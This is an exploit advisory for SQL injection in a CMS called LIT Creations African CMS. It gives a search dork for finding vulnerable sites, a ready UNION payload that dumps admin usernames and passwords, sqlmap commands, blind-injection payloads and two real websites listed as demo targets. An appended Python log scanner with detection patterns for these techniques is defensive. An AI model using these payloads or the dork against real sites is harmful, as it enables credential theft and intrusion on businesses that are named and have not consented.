LIT Creations African CMS SQL injection

2019.06.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: LIT Creations African CMS SQL injection
# Date: 2019-06-10
# Dork : intext:"Website designed and hosted by LIT Creations" inurl:id=
# Exploit Author: S I R M A X
# Vendor Homepage: https://www.litcreations.com/
# Version: All Version
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] Method ( Sql injection )
H_A_Security Security Team of IRan
[+] parameter : ID == php?ID=
=================================================================================
Mode Hash : MD5
=================
-----== Way 1(No machine use) ==-----
[#] Testing Method:
[+] - UNION query
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
Exploits ==>
[*] id=-847' UNION SELECT 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(table(admin))WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,usern,0x3c62723e,0x70617373,0x203d3d3e20,pswrd,0x3c62723e,0x3c62723e))))x),3,4,5,6,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(table(admin))WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,usern,0x3c62723e,0x70617373,0x203d3d3e20,pswrd,0x3c62723e,0x3c62723e))))x),[Number of columns]-- -
<-> #At all sites, Column 2 or 7 is 100% vulnerable
<-> #Note that you should find the name of the admin table and put it in the exploit
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
=================================================================================
-----== Way 2(using the machine) ==-----
[+] Sqlmap:
[-] sqlmap.py -u https://gohealthy.co.za/product.php?id=1 --dbs
[#] Testing Method:
[+] - boolean-based blind
[+] - time-based blind
[+] - UNION query
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
|||||||||||||||||||||||
Parameter: id (GET)  ||
|||||||||||||||||||||||
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=847' AND 5651=5651 AND 'gEnD'='gEnD
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=847' AND SLEEP(5) AND 'spZF'='spZF
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=-9178' UNION ALL SELECT NULL,CONCAT(0x716a717871,0x466f4b58426e547a66684763786150476779496f4b556548427069736d70664d414f5771615a6a50,0x716b7a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- qUjC
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
=================================================================================
Demo:
[+] https://www.thelearningpoint.co.za/events.php?id=[SQL]
[+] https://gohealthy.co.za/product.php?id=[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @H_A_SeCuRiTy
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
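
The three techniques reported above for the id parameter (boolean-based blind, time-based blind, UNION query) leave recognizable traces in web server access logs. The following is an added example, not part of the original advisory: it flags every id value that is not a plain integer and labels it by technique. The log lines, client addresses and the names classify_id and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Technique classes listed in the advisory, checked in this order.
SIGNATURES = [
    ("UNION query", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
]
# Request target inside a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP range, hypothetical paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2019:10:00:01 +0000] "GET /product.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jun/2019:10:00:05 +0000] "GET /product.php?id=847%27%20AND%205651%3D5651%20AND%20%27gEnD%27%3D%27gEnD HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jun/2019:10:00:09 +0000] "GET /product.php?id=847%27%20AND%20SLEEP(5)%20AND%20%27spZF%27%3D%27spZF HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jun/2019:10:00:15 +0000] "GET /events.php?ID=-9178%27%20UNION%20ALL%20SELECT%20NULL,NULL--%20qUjC HTTP/1.1" 200 733',
]

def classify_id(value):
    """Return None for a plain integer id, otherwise a technique label."""
    if re.fullmatch(r"\d{1,10}", value):
        return None  # the only shape a legitimate id should have
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "non-numeric id"

def scan(log_lines):
    """Return (client, label, decoded id value) for each suspicious request."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        client = line.split()[0]
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes values; the advisory shows both "id" and "ID".
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() == "id":
                label = classify_id(value)
                if label:
                    findings.append((client, label, value))
    return findings

if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(f"{client}  {label}: {value}")
```

The same integer-only rule applied in the application, with id bound as a query parameter rather than concatenated into the SQL string, removes the injection point itself.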

